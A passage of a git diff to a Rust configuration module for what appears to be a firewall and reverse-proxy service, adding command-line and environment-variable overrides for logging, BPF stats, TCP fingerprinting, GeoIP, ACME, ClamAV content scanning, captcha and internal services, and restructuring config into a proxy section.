facility) = args.syslog_facility { + self.logging.syslog.facility = facility.clone(); + } + if let Some(ref identifier) = args.syslog_identifier { + self.logging.syslog.identifier = identifier.clone(); + } + + // BPF stats configuration overrides + if let Some(enabled) = args.bpf_stats_enabled { + self.logging.bpf_stats.enabled = enabled; + } + if let Some(interval) = args.bpf_stats_log_interval { + self.logging.bpf_stats.log_interval_secs = interval; + } + if let Some(enabled) = args.bpf_stats_enable_dropped_ip_events { + self.logging.bpf_stats.enable_dropped_ip_events = enabled; + } + if let Some(interval) = args.bpf_stats_dropped_ip_events_interval { + self.logging.bpf_stats.dropped_ip_events_interval_secs = interval; + } + + // TCP fingerprint configuration overrides + if let Some(enabled) = args.tcp_fingerprint_enabled { + self.logging.tcp_fingerprint.enabled = enabled; + } + if let Some(interval) = args.tcp_fingerprint_log_interval { + self.logging.tcp_fingerprint.log_interval_secs = interval; + } + if let Some(enabled) = args.tcp_fingerprint_enable_events { + self.logging.tcp_fingerprint.enable_fingerprint_events = enabled; + } + if let Some(interval) = args.tcp_fingerprint_events_interval { + self.logging + .tcp_fingerprint + .fingerprint_events_interval_secs = interval; + } + if let Some(count) = args.tcp_fingerprint_min_packet_count { + self.logging.tcp_fingerprint.min_packet_count = count; + } + if let Some(duration) = args.tcp_fingerprint_min_connection_duration { + self.logging.tcp_fingerprint.min_connection_duration_secs = duration; + } + + // Daemon chown PID file override + self.daemon.chown_pid_file = args.daemon_chown_pid_file; + + // Proxy address configuration overrides + if let Some(ref addr) = args.proxy_address_http { + self.proxy.address_http = addr.clone(); + } + if let Some(ref addr) = args.proxy_address_tls { + self.proxy.address_tls = Some(addr.clone()); + } + if let Some(ref certs) = args.proxy_certificates { + self.proxy.certificates = Some(certs.clone()); + } + if let Some(ref grade) = args.proxy_tls_grade { + self.proxy.tls_grade = grade.clone(); + } + if let Some(ref cert) = args.proxy_default_certificate { + self.proxy.default_certificate = Some(cert.clone()); + } + + // Upstream configuration overrides + if let Some(ref conf) = args.upstream_conf { + self.proxy.upstream.conf = conf.clone(); + } + if let Some(ref method) = args.upstream_healthcheck_method { + self.proxy.upstream.healthcheck.method = method.clone(); + } + if let Some(interval) = args.upstream_healthcheck_interval { + self.proxy.upstream.healthcheck.interval = interval.min(u16::MAX as u64) as u16; + } + + // GeoIP configuration overrides + if let Some(ref url) = args.geoip_country_url { + self.proxy.geoip.country.url = url.clone(); + } + if let Some(ref path) = args.geoip_country_path { + self.proxy.geoip.country.path = Some(PathBuf::from(path)); + } + if let Some(ref url) = args.geoip_asn_url { + self.proxy.geoip.asn.url = url.clone(); + } + if let Some(ref path) = args.geoip_asn_path { + self.proxy.geoip.asn.path = Some(PathBuf::from(path)); + } + if let Some(ref url) = args.geoip_city_url { + self.proxy.geoip.city.url = url.clone(); + } + if let Some(ref path) = args.geoip_city_path { + self.proxy.geoip.city.path = Some(PathBuf::from(path)); + } + if let Some(refresh_secs) = args.geoip_refresh_secs { + self.proxy.geoip.refresh_secs = refresh_secs; + } + + // ACME configuration overrides + if let Some(enabled) = args.acme_enabled { + self.proxy.acme.enabled = enabled; + } + if let Some(port) = args.acme_port { + self.proxy.acme.port = port; + } + if let Some(ref email) = args.acme_email { + self.proxy.acme.email = Some(email.clone()); + } + if let Some(ref path) = args.acme_storage_path { + self.proxy.acme.storage_path = path.clone(); + } + if let Some(ref storage_type) = args.acme_storage_type { + self.proxy.acme.storage_type = Some(storage_type.clone()); + } + if let Some(development) = args.acme_development { + self.proxy.acme.development = development; + } + if let Some(ref redis_url) = args.acme_redis_url { + self.proxy.acme.redis_url = Some(redis_url.clone()); + } + + // Content scanning configuration overrides + if let Some(enabled) = args.content_scanning_enabled { + self.proxy.content_scanning.enabled = enabled; + } + if let Some(ref server) = args.content_scanning_clamav_server { + self.proxy.content_scanning.clamav_server = server.clone(); + } + if let Some(size) = args.content_scanning_max_file_size { + self.proxy.content_scanning.max_file_size = size; + } + + // Internal services configuration overrides + if let Some(enabled) = args.internal_services_enabled { + self.proxy.internal_services.enabled = enabled; + } + if let Some(port) = args.internal_services_port { + self.proxy.internal_services.port = port; + } + if let Some(ref bind_ip) = args.internal_services_bind_ip { + self.proxy.internal_services.bind_ip = bind_ip.clone(); } } @@ -444,17 +700,19 @@ impl Config { Ok(()) } - pub fn load_from_args(args: &Args) -> Result { - let mut config = if let Some(config_path) = &args.config { + pub fn load_from_args(args: &Args) -> Result<(Self, ConfigDiagnostics)> { + let (mut config, diagnostics) = if let Some(config_path) = &args.config { + eprintln!("Using config file: {}", config_path.display()); Self::load_from_file(config_path)? } else { - Self::default() + eprintln!("No config file provided; using defaults and CLI/env overrides"); + (Self::default(), ConfigDiagnostics::default()) }; config.merge_with_args(args); config.apply_env_overrides(); config.validate_required_fields(args)?; - Ok(config) + Ok((config, diagnostics)) } pub fn apply_env_overrides(&mut self) { @@ -468,7 +726,11 @@ impl Config { // Fallback to AX_ prefix with deprecation warning let ax_name = format!("AX_{}", name); if let Ok(val) = env::var(&ax_name) { - log::warn!("Environment variable '{}' is deprecated, use '{}' instead. The AX_ prefix will be removed in a future version.", ax_name, name); + log::warn!( + "Environment variable '{}' is deprecated, use '{}' instead. The AX_ prefix will be removed in a future version.", + ax_name, + name + ); return Some(val); } None @@ -484,19 +746,31 @@ impl Config { // Fallback to AX_ prefix with deprecation warning let ax_name = format!("AX_{}", name); if let Ok(val) = env::var(&ax_name) { - log::warn!("Environment variable '{}' is deprecated, use '{}' instead. The AX_ prefix will be removed in a future version.", ax_name, name); + log::warn!( + "Environment variable '{}' is deprecated, use '{}' instead. The AX_ prefix will be removed in a future version.", + ax_name, + name + ); return Some(val); } // Fallback to AX_ARXIGNIS_ prefix with deprecation warning let ax_arxignis_name = format!("AX_ARXIGNIS_{}", name); if let Ok(val) = env::var(&ax_arxignis_name) { - log::warn!("Environment variable '{}' is deprecated, use '{}' instead. The ARXIGNIS prefix will be removed in a future version.", ax_arxignis_name, name); + log::warn!( + "Environment variable '{}' is deprecated, use '{}' instead. The ARXIGNIS prefix will be removed in a future version.", + ax_arxignis_name, + name + ); return Some(val); } // Fallback to ARXIGNIS_ prefix with deprecation warning let arxignis_name = format!("ARXIGNIS_{}", name); if let Ok(val) = env::var(&arxignis_name) { - log::warn!("Environment variable '{}' is deprecated, use '{}' instead. The ARXIGNIS prefix will be removed in a future version.", arxignis_name, name); + log::warn!( + "Environment variable '{}' is deprecated, use '{}' instead. The ARXIGNIS prefix will be removed in a future version.", + arxignis_name, + name + ); return Some(val); } None @@ -523,10 +797,10 @@ impl Config { // Redis configuration overrides if let Some(val) = get_env("REDIS_URL") { - self.redis.url = val; + self.proxy.redis.url = val; } if let Some(val) = get_env("REDIS_PREFIX") { - self.redis.prefix = val; + self.proxy.redis.prefix = val; } // Redis SSL configuration overrides @@ -540,17 +814,17 @@ impl Config { if ca_cert_path.is_some() || client_cert_path.is_some() || client_key_path.is_some() - || insecure_val.is_some() { - + || insecure_val.is_some() + { // Create SSL config if it doesn't exist - if self.redis.ssl.is_none() { + if self.proxy.redis.ssl.is_none() { // Parse insecure value if provided, default to false let insecure_default = insecure_val .as_ref() .and_then(|v| v.parse::().ok()) .unwrap_or(false); - self.redis.ssl = Some(RedisSslConfig { + self.proxy.redis.ssl = Some(RedisSslConfig { ca_cert_path: None, client_cert_path: None, client_key_path: None, @@ -559,7 +833,12 @@ impl Config { } // Update the SSL config with values from environment variables - let ssl = self.redis.ssl.as_mut().expect("SSL config should exist here"); + let ssl = self + .proxy + .redis + .ssl + .as_mut() + .expect("SSL config should exist here"); if let Some(val) = ca_cert_path { ssl.ca_cert_path = Some(val); } @@ -583,19 +862,6 @@ impl Config { if let Some(val) = get_env("NETWORK_IFACES") { self.network.ifaces = val.split(',').map(|s| s.trim().to_string()).collect(); } - if let Some(val) = get_env("NETWORK_DISABLE_XDP") { - self.network.disable_xdp = val.parse().unwrap_or(false); - } - if let Some(val) = get_env("FIREWALL_MODE").or_else(|| get_env("NETWORK_FIREWALL_MODE")) { - self.network.firewall_mode = match val.to_lowercase().as_str() { - "auto" => crate::firewall::FirewallMode::Auto, - "xdp" => crate::firewall::FirewallMode::Xdp, - "nftables" => crate::firewall::FirewallMode::Nftables, - "iptables" => crate::firewall::FirewallMode::Iptables, - "none" => crate::firewall::FirewallMode::None, - _ => crate::firewall::FirewallMode::Auto, - }; - } if let Some(val) = get_env("NETWORK_IP_VERSION") { // Validate ip_version value match val.as_str() { @@ -603,11 +869,31 @@ impl Config { self.network.ip_version = val; } _ => { - log::warn!("Invalid NETWORK_IP_VERSION value '{}', using default 'both'. Valid values: ipv4, ipv6, both", val); + log::warn!( + "Invalid NETWORK_IP_VERSION value '{}', using default 'both'. Valid values: ipv4, ipv6, both", + val + ); } } } + // Firewall configuration overrides + if let Some(val) = + get_env("FIREWALL_DISABLE_XDP").or_else(|| get_env("NETWORK_DISABLE_XDP")) + { + self.firewall.disable_xdp = val.parse().unwrap_or(false); + } + if let Some(val) = get_env("FIREWALL_MODE").or_else(|| get_env("NETWORK_FIREWALL_MODE")) { + self.firewall.mode = match val.to_lowercase().as_str() { + "auto" => crate::firewall::FirewallMode::Auto, + "xdp" => crate::firewall::FirewallMode::Xdp, + "nftables" => crate::firewall::FirewallMode::Nftables, + "iptables" => crate::firewall::FirewallMode::Iptables, + "none" => crate::firewall::FirewallMode::None, + _ => crate::firewall::FirewallMode::Auto, + }; + } + // Gen0Sec configuration overrides // Supports: AX_API_KEY, API_KEY, AX_ARXIGNIS_API_KEY, ARXIGNIS_API_KEY (backward compat) if let Some(val) = get_env_arxignis("API_KEY") { @@ -632,53 +918,78 @@ impl Config { if let Some(val) = get_env("LOGGING_LEVEL") { self.logging.level = val; } + if let Some(val) = get_env("LOGGING_FILE_ENABLED") { + self.logging.file_logging_enabled = val.parse().unwrap_or(false); + } + if let Some(val) = get_env("LOGGING_DIRECTORY") { + self.logging.log_directory = val; + } + if let Some(val) = get_env("LOGGING_MAX_FILE_SIZE") { + self.logging.max_log_size = val.parse().unwrap_or(100 * 1024 * 1024); + } + if let Some(val) = get_env("LOGGING_FILE_COUNT") { + self.logging.log_file_count = val.parse().unwrap_or(10); + } + + // Syslog configuration overrides + if let Some(val) = get_env("LOGGING_SYSLOG_ENABLED") { + self.logging.syslog.enabled = val.parse().unwrap_or(false); + } + if let Some(val) = get_env("LOGGING_SYSLOG_FACILITY") { + self.logging.syslog.facility = val; + } + if let Some(val) = get_env("LOGGING_SYSLOG_IDENTIFIER") { + self.logging.syslog.identifier = val; + } // Content scanning overrides if let Some(val) = get_env("CONTENT_SCANNING_ENABLED") { - self.content_scanning.enabled = val.parse().unwrap_or(false); + self.proxy.content_scanning.enabled = val.parse().unwrap_or(false); } if let Some(val) = get_env("CLAMAV_SERVER") { - self.content_scanning.clamav_server = val; + self.proxy.content_scanning.clamav_server = val; } if let Some(val) = get_env("CONTENT_MAX_FILE_SIZE") { - self.content_scanning.max_file_size = val.parse().unwrap_or(10 * 1024 * 1024); - } - if let Some(val) = get_env("CONTENT_SCAN_CONTENT_TYPES") { - self.content_scanning.scan_content_types = val.split(',').map(|s| s.trim().to_string()).collect(); - } - if let Some(val) = get_env("CONTENT_SKIP_EXTENSIONS") { - self.content_scanning.skip_extensions = val.split(',').map(|s| s.trim().to_string()).collect(); - } - if let Some(val) = get_env("CONTENT_SCAN_EXPRESSION") { - self.content_scanning.scan_expression = val; + self.proxy.content_scanning.max_file_size = val.parse().unwrap_or(10 * 1024 * 1024); } // Captcha configuration overrides if let Some(val) = get_env("CAPTCHA_SITE_KEY") { - self.platform.captcha.site_key = Some(val); + self.proxy.captcha.site_key = Some(val); } if let Some(val) = get_env("CAPTCHA_SECRET_KEY") { - self.platform.captcha.secret_key = Some(val); + self.proxy.captcha.secret_key = Some(val); } if let Some(val) = get_env("CAPTCHA_JWT_SECRET") { - self.platform.captcha.jwt_secret = Some(val); + self.proxy.captcha.jwt_secret = Some(val); } if let Some(val) = get_env("CAPTCHA_PROVIDER") { - self.platform.captcha.provider = val; + self.proxy.captcha.provider = val; } if let Some(val) = get_env("CAPTCHA_TOKEN_TTL") { - self.platform.captcha.token_ttl = val.parse().unwrap_or(7200); + self.proxy.captcha.token_ttl = val.parse().unwrap_or(7200); } if let Some(val) = get_env("CAPTCHA_CACHE_TTL") { - self.platform.captcha.cache_ttl = val.parse().unwrap_or(300); + self.proxy.captcha.cache_ttl = val.parse().unwrap_or(300); + } + + // Internal services configuration overrides + if let Some(val) = get_env("INTERNAL_SERVICES_ENABLED") { + self.proxy.internal_services.enabled = val.parse().unwrap_or(true); + } + if let Some(val) = get_env("INTERNAL_SERVICES_PORT") { + self.proxy.internal_services.port = val.parse().unwrap_or(9180); + } + if let Some(val) = get_env("INTERNAL_SERVICES_BIND_IP") { + self.proxy.internal_services.bind_ip = val; } // Proxy protocol configuration overrides if let Some(val) = get_env("PROXY_PROTOCOL_ENABLED") { - self.pingora.proxy_protocol.enabled = val.parse().unwrap_or(false); + self.proxy.protocol.enabled = val.parse().unwrap_or(false); } if let Some(val) = get_env("PROXY_PROTOCOL_TIMEOUT") { - self.pingora.proxy_protocol.timeout_ms = val.parse().unwrap_or(1000); + self.proxy.protocol.timeout_ms = val.parse().unwrap_or(1000); } // Daemon configuration overrides @@ -691,12 +1002,6 @@ impl Config { if let Some(val) = get_env("DAEMON_WORKING_DIRECTORY") { self.daemon.working_directory = val; } - if let Some(val) = get_env("DAEMON_STDOUT") { - self.daemon.stdout = val; - } - if let Some(val) = get_env("DAEMON_STDERR") { - self.daemon.stderr = val; - } if let Some(val) = get_env("DAEMON_USER") { self.daemon.user = Some(val); } @@ -706,6 +1011,147 @@ impl Config { if let Some(val) = get_env("DAEMON_CHOWN_PID_FILE") { self.daemon.chown_pid_file = val.parse().unwrap_or(true); } + + // Threat MMDB configuration overrides + if let Some(val) = get_env("THREAT_MMDB_URL") { + self.platform.threat.url = val; + } + if let Some(val) = get_env("THREAT_MMDB_PATH") { + self.platform.threat.path = Some(PathBuf::from(val)); + } + if let Some(val) = get_env("THREAT_MMDB_REFRESH_SECS") { + if let Ok(refresh_secs) = val.parse::() { + self.platform.threat.refresh_secs = Some(refresh_secs); + } + } + + // BPF stats configuration overrides + if let Some(val) = get_env("BPF_STATS_ENABLED") { + self.logging.bpf_stats.enabled = val.parse().unwrap_or(true); + } + if let Some(val) = get_env("BPF_STATS_LOG_INTERVAL") { + if let Ok(interval) = val.parse::() { + self.logging.bpf_stats.log_interval_secs = interval; + } + } + if let Some(val) = get_env("BPF_STATS_ENABLE_DROPPED_IP_EVENTS") { + self.logging.bpf_stats.enable_dropped_ip_events = val.parse().unwrap_or(true); + } + if let Some(val) = get_env("BPF_STATS_DROPPED_IP_EVENTS_INTERVAL") { + if let Ok(interval) = val.parse::() { + self.logging.bpf_stats.dropped_ip_events_interval_secs = interval; + } + } + + // TCP fingerprint configuration overrides + if let Some(val) = get_env("TCP_FINGERPRINT_ENABLED") { + self.logging.tcp_fingerprint.enabled = val.parse().unwrap_or(true); + } + if let Some(val) = get_env("TCP_FINGERPRINT_LOG_INTERVAL") { + if let Ok(interval) = val.parse::() { + self.logging.tcp_fingerprint.log_interval_secs = interval; + } + } + if let Some(val) = get_env("TCP_FINGERPRINT_ENABLE_EVENTS") { + self.logging.tcp_fingerprint.enable_fingerprint_events = val.parse().unwrap_or(true); + } + if let Some(val) = get_env("TCP_FINGERPRINT_EVENTS_INTERVAL") { + if let Ok(interval) = val.parse::() { + self.logging + .tcp_fingerprint + .fingerprint_events_interval_secs = interval; + } + } + if let Some(val) = get_env("TCP_FINGERPRINT_MIN_PACKET_COUNT") { + if let Ok(count) = val.parse::() { + self.logging.tcp_fingerprint.min_packet_count = count; + } + } + if let Some(val) = get_env("TCP_FINGERPRINT_MIN_CONNECTION_DURATION") { + if let Ok(duration) = val.parse::() { + self.logging.tcp_fingerprint.min_connection_duration_secs = duration; + } + } + + // Proxy address configuration overrides + if let Some(val) = get_env("PROXY_ADDRESS_HTTP") { + self.proxy.address_http = val; + } + if let Some(val) = get_env("PROXY_ADDRESS_TLS") { + self.proxy.address_tls = Some(val); + } + if let Some(val) = get_env("PROXY_CERTIFICATES") { + self.proxy.certificates = Some(val); + } + if let Some(val) = get_env("PROXY_TLS_GRADE") { + self.proxy.tls_grade = val; + } + if let Some(val) = get_env("PROXY_DEFAULT_CERTIFICATE") { + self.proxy.default_certificate = Some(val); + } + + // Upstream configuration overrides + if let Some(val) = get_env("UPSTREAM_CONF") { + self.proxy.upstream.conf = val; + } + if let Some(val) = get_env("UPSTREAM_HEALTHCHECK_METHOD") { + self.proxy.upstream.healthcheck.method = val; + } + if let Some(val) = get_env("UPSTREAM_HEALTHCHECK_INTERVAL") { + if let Ok(interval) = val.parse::() { + self.proxy.upstream.healthcheck.interval = interval.min(u16::MAX as u64) as u16; + } + } + + // GeoIP configuration overrides + if let Some(val) = get_env("GEOIP_COUNTRY_URL") { + self.proxy.geoip.country.url = val; + } + if let Some(val) = get_env("GEOIP_COUNTRY_PATH") { + self.proxy.geoip.country.path = Some(PathBuf::from(val)); + } + if let Some(val) = get_env("GEOIP_ASN_URL") { + self.proxy.geoip.asn.url = val; + } + if let Some(val) = get_env("GEOIP_ASN_PATH") { + self.proxy.geoip.asn.path = Some(PathBuf::from(val)); + } + if let Some(val) = get_env("GEOIP_CITY_URL") { + self.proxy.geoip.city.url = val; + } + if let Some(val) = get_env("GEOIP_CITY_PATH") { + self.proxy.geoip.city.path = Some(PathBuf::from(val)); + } + if let Some(val) = get_env("GEOIP_REFRESH_SECS") { + if let Ok(refresh_secs) = val.parse::() { + self.proxy.geoip.refresh_secs = refresh_secs; + } + } + + // ACME configuration overrides + if let Some(val) = get_env("ACME_ENABLED") { + self.proxy.acme.enabled = val.parse().unwrap_or(false); + } + if let Some(val) = get_env("ACME_PORT") { + if let Ok(port) = val.parse::() { + self.proxy.acme.port = port; + } + } + if let Some(val) = get_env("ACME_EMAIL") { + self.proxy.acme.email = Some(val); + } + if let Some(val) = get_env("ACME_STORAGE_PATH") { + self.proxy.acme.storage_path = val; + } + if let Some(val) = get_env("ACME_STORAGE_TYPE") { + self.proxy.acme.storage_type = Some(val); + } + if let Some(val) = get_env("ACME_DEVELOPMENT") { + self.proxy.acme.development = val.parse().unwrap_or(false); + } + if let Some(val) = get_env("ACME_REDIS_URL") { + self.proxy.acme.redis_url = Some(val); + } } } @@ -725,12 +1171,12 @@ pub struct Args { #[arg(long)] pub clear_certificate: Option, - /// Redis connection URL for ACME cache storage. + /// Redis connection URL for ACME cache storage. #[arg(long, default_value = "redis://127.0.0.1/0")] pub redis_url: String, /// Namespace prefix for Redis ACME cache entries. - #[arg(long, default_value = "ax:synapse")] + #[arg(long, default_value = "g0s:synapse")] pub redis_prefix: String, /// The network interface to attach the XDP program to. @@ -788,7 +1234,6 @@ pub struct Args { #[arg(long, value_enum)] pub captcha_provider: Option, - /// Captcha token TTL in seconds #[arg(long, default_value = "7200")] pub captcha_token_ttl: u64, @@ -817,14 +1262,6 @@ pub struct Args { #[arg(long, default_value = "/")] pub daemon_working_dir: String, - /// Stdout log file for daemon mode - #[arg(long, default_value = "/var/log/synapse.out")] - pub daemon_stdout: String, - - /// Stderr log file for daemon mode - #[arg(long, default_value = "/var/log/synapse.err")] - pub daemon_stderr: String, - /// User to run daemon as #[arg(long)] pub daemon_user: Option, @@ -832,6 +1269,210 @@ pub struct Args { /// Group to run daemon as #[arg(long)] pub daemon_group: Option, + + /// Change ownership of PID file to daemon user/group + #[arg(long, default_value_t = true)] + pub daemon_chown_pid_file: bool, + + /// Application mode (agent or proxy) + #[arg(long)] + pub mode: Option, + + /// Network IP version support (ipv4, ipv6, both) + #[arg(long)] + pub network_ip_version: Option, + + /// Threat MMDB download URL + #[arg(long)] + pub threat_mmdb_url: Option, + + /// Threat MMDB local path + #[arg(long)] + pub threat_mmdb_path: Option, + + /// Threat MMDB refresh interval in seconds + #[arg(long)] + pub threat_mmdb_refresh_secs: Option, + + /// Enable file-based logging + #[arg(long)] + pub file_logging_enabled: Option, + + /// Log directory path + #[arg(long)] + pub log_directory: Option, + + /// Maximum log file size in bytes + #[arg(long)] + pub max_log_size: Option, + + /// Number of rotated log files to keep + #[arg(long)] + pub log_file_count: Option, + + /// Enable syslog output + #[arg(long)] + pub syslog_enabled: Option, + + /// Syslog facility + #[arg(long)] + pub syslog_facility: Option, + + /// Syslog identifier + #[arg(long)] + pub syslog_identifier: Option, + + /// Enable BPF statistics collection + #[arg(long)] + pub bpf_stats_enabled: Option, + + /// BPF statistics log interval in seconds + #[arg(long)] + pub bpf_stats_log_interval: Option, + + /// Enable dropped IP events logging + #[arg(long)] + pub bpf_stats_enable_dropped_ip_events: Option, + + /// Dropped IP events interval in seconds + #[arg(long)] + pub bpf_stats_dropped_ip_events_interval: Option, + + /// Enable TCP fingerprinting + #[arg(long)] + pub tcp_fingerprint_enabled: Option, + + /// TCP fingerprint log interval in seconds + #[arg(long)] + pub tcp_fingerprint_log_interval: Option, + + /// Enable TCP fingerprint events logging + #[arg(long)] + pub tcp_fingerprint_enable_events: Option, + + /// TCP fingerprint events interval in seconds + #[arg(long)] + pub tcp_fingerprint_events_interval: Option, + + /// TCP fingerprint minimum packet count + #[arg(long)] + pub tcp_fingerprint_min_packet_count: Option, + + /// TCP fingerprint minimum connection duration in seconds + #[arg(long)] + pub tcp_fingerprint_min_connection_duration: Option, + + /// HTTP proxy bind address + #[arg(long)] + pub proxy_address_http: Option, + + /// TLS proxy bind address + #[arg(long)] + pub proxy_address_tls: Option, + + /// Certificate directory path + #[arg(long)] + pub proxy_certificates: Option, + + /// TLS suite grade (high, medium, unsafe) + #[arg(long)] + pub proxy_tls_grade: Option, + + /// Default certificate name + #[arg(long)] + pub proxy_default_certificate: Option, + + /// Upstream configuration file path + #[arg(long)] + pub upstream_conf: Option, + + /// Upstream health check method + #[arg(long)] + pub upstream_healthcheck_method: Option, + + /// Upstream health check interval in seconds + #[arg(long)] + pub upstream_healthcheck_interval: Option, + + /// GeoIP Country database URL + #[arg(long)] + pub geoip_country_url: Option, + + /// GeoIP Country database path + #[arg(long)] + pub geoip_country_path: Option, + + /// GeoIP ASN database URL + #[arg(long)] + pub geoip_asn_url: Option, + + /// GeoIP ASN database path + #[arg(long)] + pub geoip_asn_path: Option, + + /// GeoIP City database URL + #[arg(long)] + pub geoip_city_url: Option, + + /// GeoIP City database path + #[arg(long)] + pub geoip_city_path: Option, + + /// GeoIP refresh interval in seconds + #[arg(long)] + pub geoip_refresh_secs: Option, + + /// Enable ACME server + #[arg(long)] + pub acme_enabled: Option, + + /// ACME server port + #[arg(long)] + pub acme_port: Option, + + /// ACME email address + #[arg(long)] + pub acme_email: Option, + + /// ACME storage path + #[arg(long)] + pub acme_storage_path: Option, + + /// ACME storage type (file or redis) + #[arg(long)] + pub acme_storage_type: Option, + + /// Use ACME development/staging server + #[arg(long)] + pub acme_development: Option, + + /// ACME Redis URL + #[arg(long)] + pub acme_redis_url: Option, + + /// Enable content scanning + #[arg(long)] + pub content_scanning_enabled: Option, + + /// ClamAV server address + #[arg(long)] + pub content_scanning_clamav_server: Option, + + /// Maximum file size for content scanning in bytes + #[arg(long)] + pub content_scanning_max_file_size: Option, + + /// Enable internal services server + #[arg(long)] + pub internal_services_enabled: Option, + + /// Internal services port + #[arg(long)] + pub internal_services_port: Option, + + /// Internal services bind IP + #[arg(long)] + pub internal_services_bind_ip: Option, } #[derive(Copy, Clone, Debug, ValueEnum)] @@ -867,10 +1508,18 @@ pub struct BpfStatsConfig { pub dropped_ip_events_interval_secs: u64, } -fn default_bpf_stats_enabled() -> bool { true } -fn default_bpf_stats_log_interval() -> u64 { 60 } -fn default_bpf_stats_enable_dropped_ip_events() -> bool { true } -fn default_bpf_stats_dropped_ip_events_interval() -> u64 { 30 } +fn default_bpf_stats_enabled() -> bool { + true +} +fn default_bpf_stats_log_interval() -> u64 { + 60 +} +fn default_bpf_stats_enable_dropped_ip_events() -> bool { + true +} +fn default_bpf_stats_dropped_ip_events_interval() -> u64 { + 30 +} #[derive(Debug, Clone, Serialize, Deserialize, Default)] pub struct TcpFingerprintConfig { @@ -888,12 +1537,24 @@ pub struct TcpFingerprintConfig { pub min_connection_duration_secs: u64, } -fn default_tcp_fingerprint_enabled() -> bool { true } -fn default_tcp_fingerprint_log_interval() -> u64 { 60 } -fn default_tcp_fingerprint_enable_fingerprint_events() -> bool { true } -fn default_tcp_fingerprint_events_interval() -> u64 { 30 } -fn default_tcp_fingerprint_min_packet_count() -> u32 { 3 } -fn default_tcp_fingerprint_min_connection_duration() -> u64 { 1 } +fn default_tcp_fingerprint_enabled() -> bool { + true +} +fn default_tcp_fingerprint_log_interval() -> u64 { + 60 +} +fn default_tcp_fingerprint_enable_fingerprint_events() -> bool { + true +} +fn default_tcp_fingerprint_events_interval() -> u64 { + 30 +} +fn default_tcp_fingerprint_min_packet_count() -> u32 { + 3 +} +fn default_tcp_fingerprint_min_connection_duration() -> u64 { + 1 +} #[derive(Debug, Clone, Serialize, Deserialize, Default)] pub struct DaemonConfig { @@ -903,58 +1564,148 @@ pub struct DaemonConfig { pub pid_file: String, #[serde(default = "default_daemon_working_directory")] pub working_directory: String, - #[serde(default = "default_daemon_stdout")] - pub stdout: String, - #[serde(default = "default_daemon_stderr")] - pub stderr: String, pub user: Option, pub group: Option, #[serde(default = "default_daemon_chown_pid_file")] pub chown_pid_file: bool, } -fn default_daemon_enabled() -> bool { false } -fn default_daemon_pid_file() -> String { "/var/run/synapse.pid".to_string() } -fn default_daemon_working_directory() -> String { "/".to_string() } -fn default_daemon_stdout() -> String { "/var/log/synapse.out".to_string() } -fn default_daemon_stderr() -> String { "/var/log/synapse.err".to_string() } -fn default_daemon_chown_pid_file() -> bool { true } +fn default_daemon_enabled() -> bool { + false +} +fn default_daemon_pid_file() -> String { + "/var/run/synapse.pid".to_string() +} +fn default_daemon_working_directory() -> String { + "/".to_string() +} +fn default_daemon_chown_pid_file() -> bool { + true +} + +#[derive(Debug, Clone, Serialize, Deserialize, Default)] +pub struct UpstreamHealthCheckConfig { + #[serde(default = "default_upstream_health_check_method")] + pub method: String, + #[serde(default = "default_upstream_health_check_interval")] + pub interval: u16, +} + +fn default_upstream_health_check_method() -> String { + "HEAD".to_string() +} +fn default_upstream_health_check_interval() -> u16 { + 2 +} #[derive(Debug, Clone, Serialize, Deserialize, Default)] -pub struct PingoraConfig { +pub struct UpstreamConfig { #[serde(default)] - pub proxy_address_http: String, + pub conf: String, #[serde(default)] - pub proxy_address_tls: Option, + pub healthcheck: UpstreamHealthCheckConfig, +} + +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct ProxyConfig { #[serde(default)] - pub proxy_certificates: Option, - #[serde(default = "default_pingora_tls_grade")] - pub proxy_tls_grade: String, + pub address_http: String, + #[serde(default)] + pub address_tls: Option, + #[serde(default)] + pub certificates: Option, + #[serde(default = "default_tls_grade")] + pub tls_grade: String, #[serde(default)] pub default_certificate: Option, + /// Redis configuration for ACME certificate storage + #[serde(default)] + pub redis: RedisConfig, + #[serde(default)] + pub upstream: UpstreamConfig, #[serde(default)] - pub upstreams_conf: String, + pub protocol: ProxyProtocolConfig, + /// GeoIP configuration #[serde(default)] - pub config_address: String, - #[serde(default = "default_pingora_config_api_enabled")] - pub config_api_enabled: bool, + pub geoip: GeoipConfig, + /// Captcha configuration #[serde(default)] - pub master_key: String, - #[serde(default = "default_pingora_log_level")] - pub log_level: String, - #[serde(default = "default_pingora_healthcheck_method")] - pub healthcheck_method: String, - #[serde(default = "default_pingora_healthcheck_interval")] - pub healthcheck_interval: u16, + pub captcha: CaptchaConfig, + /// ACME configuration #[serde(default)] - pub proxy_protocol: ProxyProtocolConfig, + pub acme: AcmeConfig, + /// Content scanning configuration + #[serde(default)] + pub content_scanning: ContentScanningCliConfig, + /// Internal services configuration + #[serde(default)] + pub internal_services: InternalServicesConfig, } -fn default_pingora_tls_grade() -> String { "medium".to_string() } -fn default_pingora_config_api_enabled() -> bool { true } -fn default_pingora_log_level() -> String { "debug".to_string() } -fn default_pingora_healthcheck_method() -> String { "HEAD".to_string() } -fn default_pingora_healthcheck_interval() -> u16 { 2 } +fn default_tls_grade() -> String { + "medium".to_string() +} + +impl Default for ProxyConfig { + fn default() -> Self { + Self { + address_http: String::new(), + address_tls: None, + certificates: None, + tls_grade: default_tls_grade(), + default_certificate: None, + redis: RedisConfig::default(), + upstream: UpstreamConfig { + conf: String::new(), + healthcheck: UpstreamHealthCheckConfig { + method: default_upstream_health_check_method(), + interval: default_upstream_health_check_interval(), + }, + }, + protocol: ProxyProtocolConfig::default(), + geoip: GeoipConfig { + country: GeoipDatabaseConfig { + url: "".to_string(), + path: None, + headers: None, + refresh_secs: None, + }, + asn: GeoipDatabaseConfig { + url: "".to_string(), + path: None, + headers: None, + refresh_secs: None, + }, + city: GeoipDatabaseConfig { + url: "".to_string(), + path: None, + headers: None, + refresh_secs: None, + }, + refresh_secs: 28800, + }, + captcha: CaptchaConfig { + site_key: None, + secret_key: None, + jwt_secret: None, + provider: "hcaptcha".to_string(), + token_ttl: 7200, + cache_ttl: 300, + }, + acme: AcmeConfig::default(), + content_scanning: ContentScanningCliConfig { + enabled: false, + clamav_server: "localhost:3310".to_string(), + max_file_size: 10 * 1024 * 1024, + }, + internal_services: InternalServicesConfig { + enabled: true, + port: 9180, + bind_ip: "127.0.0.1".to_string(), + }, + } + } +} #[derive(Debug, Clone, Serialize, Deserialize)] pub struct AcmeConfig { @@ -992,36 +1743,32 @@ impl Default for AcmeConfig { } } -fn default_acme_enabled() -> bool { false } -fn default_acme_port() -> u16 { 9180 } -fn default_acme_storage_path() -> String { 